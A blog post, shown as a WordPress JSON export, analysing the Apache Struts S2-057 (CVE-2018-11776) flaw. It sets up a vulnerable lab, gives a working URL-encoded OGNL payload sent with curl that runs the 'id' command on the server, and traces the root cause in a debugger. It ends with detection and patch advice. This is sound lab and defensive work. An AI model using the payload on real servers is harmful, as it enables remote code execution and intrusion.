{"id":233,"date":"2019-02-01T17:22:00","date_gmt":"2019-02-01T22:22:00","guid":{"rendered":"http:\/\/www.wispwisp.com\/?p=233"},"modified":"2020-11-09T03:14:13","modified_gmt":"2020-11-09T03:14:13","slug":"apache-struts-s2-057-poc-and-dynamic-analysis","status":"publish","type":"post","link":"https:\/\/www.wispwisp.com\/index.php\/2019\/02\/01\/apache-struts-s2-057-poc-and-dynamic-analysis\/","title":{"rendered":"Apache Struts s2-057 POC and dynamic analysis"},"content":{"rendered":"

The detail about Apache Struts S2-057 Vulnerability:<\/span> https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2018-11776<\/a><\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\nUbuntu:<\/strong><\/span>
\n1. Setup the environment<\/span><\/strong>
\n1.1 System version: ubuntu 14.04.<\/span>
\n\"\"<\/span>
\n1.2 Install apache tomcat:<\/span><\/p>\n

sudo apt-get install tomcat7\nsudo apt-get install tomcat7-docs tomcat7-admin tomcat7-examples\nsudo apt-get install default-jdk<\/pre>\n
1.3 Download the vulnerable Apache struts from: https:\/\/archive.apache.org\/dist\/struts\/2.3.34\/<\/span>
\n1.4 Extra files from the Zip file and deploy the struts-2.3.34\/apps\/struts2-showcase.war with tomcat manager:<\/span>
\n\"\"<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n1.5 Set the \u201cstruts2-showcase.war\u201d as ROOT application:<\/span><\/p>\n
cd \/var\/lib\/tomcat7\/webapps\nmv struts2-showcase ROOT<\/pre>\n
\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n2. Make it vulnerable:<\/span><\/strong>
\n2.1 As mentioned in the CVE detail, the \u201calwaysSelectFullNamespace\u201d need to equal to true. Add:<\/span><\/p>\n
<constant name=\"struts.mapper.alwaysSelectFullNamespace\" value=\"true\" \/><\/pre>\n
into <\/span><\/p>\n
\/var\/lib\/tomcat7\/webapps\/ROOT\/WEB-INF\/classes\/struts.xml<\/pre>\n
\"\"<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n2.2 Base on this blog post, https:\/\/semmle.com\/news\/apache-struts-CVE-2018-11776, one way to setup the vulnerable application is: define a result without a namespece:<\/span>
\nCreate this action and add it to \/var\/lib\/tomcat7\/webapps\/ROOT\/WEB-INF\/classes\/struts.xml<\/span><\/p>\n
<action name=\u201chello\u201d>\n<result type=\"redirectAction\">\n<param name=\"actionName\">data.action<\/param>\n<\/result>\n<\/action><\/pre>\n
2.3 Restart the tomcat server:<\/span>
\nservice tomcat7 restart<\/code><\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n3. Exploit:<\/strong><\/span>
\nA simple OGNL expressions ${2*3},\u00a0URLencode ${2*3}:%24%7b%31%32%33%2a%31%32%33%7d<\/span><\/p>\n
curl -v http:\/\/127.0.0.1:8080\/%24%7b%32%2a%33%7d\/hello.action<\/pre>\n
\"\"<\/span><\/p>\n
\n
\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\nMacOS:<\/strong><\/span>
\n1. Setup the environment\u00a0<\/strong><\/span>
\nSystem: macOS Sierra\u00a0 version 10.12.6<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n1.1 Download and Install Eclipse Java EE IDE for Web Developers:\u00a0\u00a0http:\/\/www.eclipse.org\/\u00a0<\/span>
\n1.2 Download the vulnerable Apache struts from: https:\/\/archive.apache.org\/dist\/struts\/2.3.34\/<\/span>
\n1.3 Install tomcat: brew install tomcat<\/span>
\n1.4 Follow this video to load Apache Struts in Eclipse: https:\/\/www.youtube.com\/watch?v=b38jZJqi_y8<\/span>
\n1.5 Follow this video to load struts-2.3.34\/apps\/struts2-showcase.war file in Eclipse: https:\/\/www.youtube.com\/watch?v=GBKzjMwQMoQ\u00a0<\/span>
\n1.6 Configure the Eclipse project running on localhost with tomcat 9.0<\/span>
\n1.7 Find out the tomcat directory:\u00a0 <\/span><\/p>\n
$brew ls tomcat: \/usr\/local\/Cellar\/tomcat\/9.0.12\/libexec\/<\/span><\/pre>\n
2. Configure the vulnerable application:<\/strong><\/span><\/p>\n
Insert<\/p>\n
<constant name=\"struts.mapper.alwaysSelectFullNamespace\" value=\"true\" \/><\/pre>\n
And<\/p>\n
<action name=\u201chelp\u201d>\n<result type=\"redirectAction\">\n<param name=\"actionName\">data.action<\/param>\n<\/result>\n<\/action><\/pre>\n
\"\"<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n3. Exploit<\/strong><\/span>
\nRun the application on Tomcat server:<\/span>
\n\"\"<\/span>
\nSend the payload with curl:<\/span><\/p>\n
curl -v '127.0.0.1:8080\/test_project\/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D\/help.action'<\/pre>\n
Which equal to:<\/span><\/p>\n
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\n(#ct=#request['struts.valueStack'].context).\n(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).\n(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\n(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).\n(#ct.setMemberAccess(#dm)).\n(#w=#ct.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\").get Writer()).\n(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()))).(#w.close())}\n<\/pre>\n
\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\nThe output of ‘ID<\/code>‘\u00a0command in server’s response:<\/span>
\n\"\"<\/span><\/p>\n
\n
Dynamic Analysis:<\/strong><\/span>
\nI don\u2019t know where to start at the beginning, because I have no idea which line of\u00a0code cause this vulnerability. Here is my thought process:<\/span>
\nThe vulnerability comes from \u201cApache Struts2\u201d which is a web application\u00a0framework, so I should be looking for a library file. The library files for \u201cstruts2-showcase.war\u201d application can be found in one of the folder after:\u00a0unzip struts2-showcase.war<\/span>
\nThere are too many .jar file in struts2-showcase\/WEB-INF\/lib\/ folder,I did some grep to find out the potential target file:<\/span><\/p>\n
grep -r -i 'alwaysSelectFullNamespace' .\ngrep -r -i 'redirectAction' .\ngrep -r -i 'Namespace' .\ngrep -r -i 'Redirect' .\ngrep -r -i 'wildcard' .\ngrep -r -i 'OGNL' .<\/pre>\n
Base on the file name from the ‘grep’ output, this two files seem interesting:<\/span><\/p>\n
Binary file .\/struts2-core-2.3.34.jar matches\nBinary file .\/struts-core-1.3.10.jar matches<\/pre>\n
\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\nAfter reaching this point, I realize I have source code file in \u201cstruts-2.3.34\u201d folder. The vulnerable action is: \u201credirectAction\u201d, I do a \u201cgrep -i -r ‘redirectAction’ .\u201d and found this word only shows up in \u201cstruts-2.3.34\/src\/core\/src\/main\/java\/org\/apache\/struts2\/dispatcher\/ServletActionRedirectResult.java<\/code>\u201d. I figure this is the file I am looking for, then I start my dynamic analysis:<\/span>
\nBreak point at ServletActionRedirectResult class:<\/span>
\n\"\"<\/span>
\nSent this command in Terminal after application is running:<\/span><\/p>\n
curl -v \u2018127.0.0.1:8080\/test_project\/%24%7b%32%2b%32%7d\/help.action\u2019<\/pre>\n
The program stop at the breakpoint, which located in ServletActionRedirectResult.java<\/code>.<\/span>
\nThe value in namespace variable is: \/${2+2}<\/code><\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n\"\"<\/span><\/p>\n
(ServletActionRedirectResult.java)<\/span><\/p>\n
Continue running the application step by step in Eclipse, program reach super.execute(invocation)<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n\"\"<\/span>
\n(TextParseUtil.java)<\/span>
\nInside the super.execute() function, program reach translateVariables() function in TextParseUtil.java, the expression\u00a0variable equal to \u201c\/${2+2}\/data.action<\/code>\u201d<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n\"\"<\/span><\/p>\n
Inside the\u00a0translateVariables() function, the program reach\u00a0parser.evaluate(openChars, expression, ognlEval, maxLoopCount) function.\u00a0The program starts to evaluate the payload.<\/span><\/p>\n
\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n\"\"<\/span>
\nInside the\u00a0parser.evaluate()<\/code> function<\/span>
\nFrom the right side, it shows\u00a0\u2018o\u2019 equals to \u20184\u2019. The payload ${2+2}<\/code> gets evaluated here and return result \u20184\u2019:<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\n\"\"<\/span><\/p>\n
\n
alwaysSelectFullNamespace?<\/strong><\/span>
\nThe process above shows the detail about \u201cnamespace\u201d get executed, but how variable namespace equal to \u201c${2+2}\u201d in the first place?\u00a0<\/span>I do a grep -i -r \u201calwaysSelectFullNamespace\u201d<\/code> try to find out how this setting causes vulnerability. <\/span>The grep command to return only one file: \u201c\/dispatcher\/mapper\/DefaultActionMapper.java\u201d<\/span>
\nThere is an If statement inDefaultActionMapper.java<\/code> <\/span>file:<\/span><\/p>\n
else if (alwaysSelectFullNamespace) {\n\/\/ Simply select the namespace as everything before the last slash\nnamespace = uri.substring(0, lastSlash);\nname = uri.substring(lastSlash + 1);\n} else {\n....<\/pre>\n
If alwaysSelectFullNamespace equal to true, namespace will equal to\u00a0uri.substring(0,lastSlash)<\/code><\/span><\/p>\n
I set a break point at parseNameAndNamespace()<\/code> function and start the application with the same payload. After the program hits the breakpoint:<\/span><\/p>\n
As the screenshot shows below, <\/span>when alwaysSelectFullNamespace equal to true, the program run into the if statement and set namespace variable equal to the payload\u00a0\u00a0\/${2+2}<\/code><\/span>
\n\"\"<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\nTo verify my assumption, I re-run the application with both breakpoint up. The program first hits the break point at\u00a0parseNameAndNamespace()<\/code> function in DefaultActionMapper.java<\/code>,\u00a0then reach\u00a0execute() function in ServletRedirectResult.java.\u00a0<\/span><\/p>\n
The root cause of this vulnerability: if the application set\u00a0\u201calwaysSelectFullNamespace\u201d variable equal to True and apache struts can’t find any\u00a0namespace in the request, it will take the user input as namespace. The program pass the namespace variable\u00a0to a OGNL evaluation function and lead to code execution.<\/span><\/p>\n
The document about namespace from apache struts: https:\/\/struts.apache.org\/core-developers\/namespace-configuration.html OGNL(from wiki):\u00a0Object-Graph Navigation Language is an open-source Expression Language for Java, which, while using simpler expressions than the full range of those supported by the Java language, allows getting and setting properties, and execution of methods of Java classes.<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\nDetection:<\/strong><\/span>
\nSince the RCE involves OGNL expression, IDS\/IPS can be set up\u00a0to detect OGNL expression in network traffic.<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\nMitigation:<\/strong><\/span>
\nUpdate Apache struts to the Version 2.5.17 or 2.3.35. The code update from Apache struts can be found here: https:\/\/github.com\/apache\/struts\/commit\/eec0d8e877dc86da4946268caf73c2f7ed5d2fc6#diff-9647a4959303ab2aa97d5eae59a00349 They fix this vulnerability by adding input validation for namespace variable.<\/span>
\n\u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c
\nReference:<\/span><\/strong>
\nhttps:\/\/www.anquanke.com\/post\/id\/157823<\/span>
\nhttps:\/\/www.secjuice.com\/apache-struts2-cve-2018-11776\/<\/span><\/p>\n
https:\/\/www.secjuice.com\/apache-struts2-cve-2018-11776\/<\/a><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"
The detail about Apache Struts S2-057 Vulnerability: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2018-11776 \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c \u200c\u200c Ubuntu: 1. Setup the environment 1.1 System version: ubuntu 14.04. 1.2 Install apache tomcat: sudo apt-get install tomcat7 sudo apt-get install tomcat7-docs tomcat7-admin tomcat7-examples sudo apt-get install default-jdk 1.3 Download the vulnerable Apache struts from: https:\/\/archive.apache.org\/dist\/struts\/2.3.34\/ 1.4 Extra files from the Zip […]<\/p>\n","protected":false},"author":1,"featured_media":690,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[],"_links":{"self":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts\/233"}],"collection":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/comments?post=233"}],"version-history":[{"count":3,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts\/233\/revisions"}],"predecessor-version":[{"id":714,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts\/233\/revisions\/714"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/media\/690"}],"wp:attachment":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/media?parent=233"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/categories?post=233"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/tags?post=233"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}